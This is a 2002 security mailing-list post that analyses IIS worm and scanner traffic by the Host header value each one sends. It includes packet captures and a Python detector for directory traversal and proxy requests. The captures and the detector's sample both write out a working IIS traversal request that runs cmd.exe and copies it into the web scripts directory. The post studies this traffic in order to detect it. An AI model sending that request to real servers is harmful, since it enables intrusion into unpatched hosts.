[Dshield] Re: New IIS directory traversal worm, or just a tool sig?

James C Slora Jr Jim.Slora at phra.com
Fri Nov 8 17:02:26 GMT 2002


"BarkerJr" wrote Thu, 7 Nov 2002 16:04:10 -0500
> Gets actually specifying a server hostname are proxy checks, I
> believe.  My guess is that someone is trying to make web server/proxies
> hack into a government web server.

I'm referring to the "Host" header field, specifically.
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14

The host name specified in an HTTP GET is used to specify the virtual host
on an IP address that could host more than one web. In the standard attacks
and worms it is normally just useless window dressing because they are
attacking the host of the default web on the target IP. IIS will ignore the
Host header field if there are no virtual hosts, and will serve the request
from the default web instead. Web server logs will not necessarily show the
host name specified in the GET because it is irrelevant for many purposes.
Packet captures will show the host name, though.

- Code Red uses www.worm.com in the "Host" header field
- Nimda uses "www" in the "Host" header field
- sfind and derivatives typically use the target's IP address in the "Host"
header field
- The "new" attempt to copy a shell to the scripts directory uses
"ww.tk.gov" in the "Host" header field.

ww.tk.gov is a nonexistent host in a nonexistent domain, so I think this
host name is just some sort of statement by the tool's author. It has no
effect on the GET request - the attack is against the system that receives
the GET, rather than a proxy attack on another server. These attempts
started just after the Turkish elections, so maybe there is some sort of
real or fake political connection.

The directory traversal requests I'm seeing look like this (two packets in
the attempt):

11/06/02-20:26:11.335063 65.93.29.79:4083 -> notavictim.net:80
TCP TTL:109 TOS:0x0 ID:22837 IpLen:20 DgmLen:164 DF
***AP*** Seq: 0xEFA00A9  Ack: 0xBE12FDC7  Win: 0x2124  TcpLen: 20
0x0030: 21 24 AB 72 00 00 47 45 54 20 2F 73 63 72 69 70  !$.r..GET /scrip
0x0040: 74 73 2F 2E 2E 25 35 63 2E 2E 25 35 63 77 69 6E  ts/..%5c..%5cwin
0x0050: 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E  nt/system32/cmd.
0x0060: 65 78 65 3F 2F 63 2B 63 6F 70 79 2B 63 3A 5C 77  exe?/c+copy+c:\w
0x0070: 69 6E 6E 74 5C 73 79 73 74 65 6D 33 32 5C 63 6D  innt\system32\cm
0x0080: 64 2E 65 78 65 2B 63 3A 5C 69 6E 65 74 70 75 62  d.exe+c:\inetpub
0x0090: 5C 73 63 72 69 70 74 73 5C 73 63 72 69 70 74 2E  \scripts\script.
0x00A0: 65 78 65 20 48 54 54 50 2F 31 2E 31 0D 0A 2E 31  exe HTTP/1.1...1
0x00B0: 0D 0A                                            ..

11/06/02-20:26:11.606866 65.93.29.79:4083 -> notavictim.net:80
TCP TTL:109 TOS:0x0 ID:27701 IpLen:20 DgmLen:72 DF
***AP*** Seq: 0xEFA0125  Ack: 0xBE12FDC7  Win: 0x2124  TcpLen: 20
0x0030: 21 24 B5 B3 00 00 41 63 63 65 70 74 3A 20 2A 2F  !$....Accept: */
0x0040: 2A 0D 0A 48 6F 73 74 3A 20 77 77 2E 74 6B 2E 67  *..Host: ww.tk.g
0x0050: 6F 76 0D 0A 0D 0A                                ov....

An attempt by a spammer to GET proxy to another host looks like this:

11/08/02-06:20:17.255774 210.117.151.172:2086 -> myhost:80 TCP
TTL:110 TOS:0x0 ID:14158 IpLen:20 DgmLen:88 DF
***AP*** Seq: 0xA6983430  Ack: 0x566FF5AE  Win: 0x4470  TcpLen: 20
0x0030: 44 70 D6 79 00 00 47 45 54 20 68 74 74 70 3A 2F  Dp.y..GET http:/
0x0040: 2F 6D 61 69 6C 2E 79 61 68 6F 6F 2E 63 6F 6D 2F  /mail.yahoo.com/
0x0050: 3F 2E 69 6E 74 6C 3D 75 73 20 48 54 54 50 2F 31  ?.intl=us HTTP/1
0x0060: 2E 30 0D 0A 0D 0A                                .0....

This proxy attempt does not use the Host field. Host is a required GET
header field, but apparently some web servers don't care. Proxying can also
be done through an HTTP CONNECT.
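As an added illustration (not part of Jim's post), a small Python classifier that separates the two request shapes discussed above: it parses a reassembled request, flags an absolute-URI request line as a proxy attempt, records the Host header, notes a missing Host on HTTP/1.1, and percent-decodes the path before looking for "..\" or "../". The sample requests are constructed from the decoded captures; since the original packets arrived split across two TCP segments, the classifier expects the reassembled text.

```python
import re
from urllib.parse import unquote, urlsplit

# Matches "../" or "..\" once the target has been percent-decoded,
# so %5c (backslash) and %2e (dot) encodings are caught as well.
TRAVERSAL = re.compile(r"\.\.[\\/]")

# Constructed samples modelled on the two captures (reassembled request text).
TRAVERSAL_SAMPLE = (
    "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe"
    "?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe HTTP/1.1\r\n"
    "Accept: */*\r\nHost: ww.tk.gov\r\n\r\n"
)
PROXY_SAMPLE = "GET http://mail.yahoo.com/?.intl=us HTTP/1.0\r\n\r\n"


def parse_request(raw: str) -> dict:
    """Split raw HTTP request text into method, target, version and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % lines[0])
    method, target, version = parts
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def classify(raw: str) -> dict:
    """Label a request as proxy-style or local, and flag traversal sequences."""
    req = parse_request(raw)
    target = req["target"]
    host = req["headers"].get("host")
    # An absolute URI in the request line asks the receiving server to proxy.
    proxy = target.lower().startswith(("http://", "https://"))
    proxy_host = urlsplit(target).hostname if proxy else None
    # Decode the path (query dropped) before matching, as IIS decoded %5c.
    decoded = unquote(target.split("?", 1)[0])
    return {
        "proxy_request": proxy,
        "proxy_host": proxy_host,
        "host_header": host,
        "missing_host_1_1": req["version"] == "HTTP/1.1" and host is None,
        "traversal": bool(TRAVERSAL.search(decoded)),
        "decoded_path": decoded,
    }


if __name__ == "__main__":
    for label, sample in (("traversal", TRAVERSAL_SAMPLE), ("proxy", PROXY_SAMPLE)):
        print(label, classify(sample))
```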
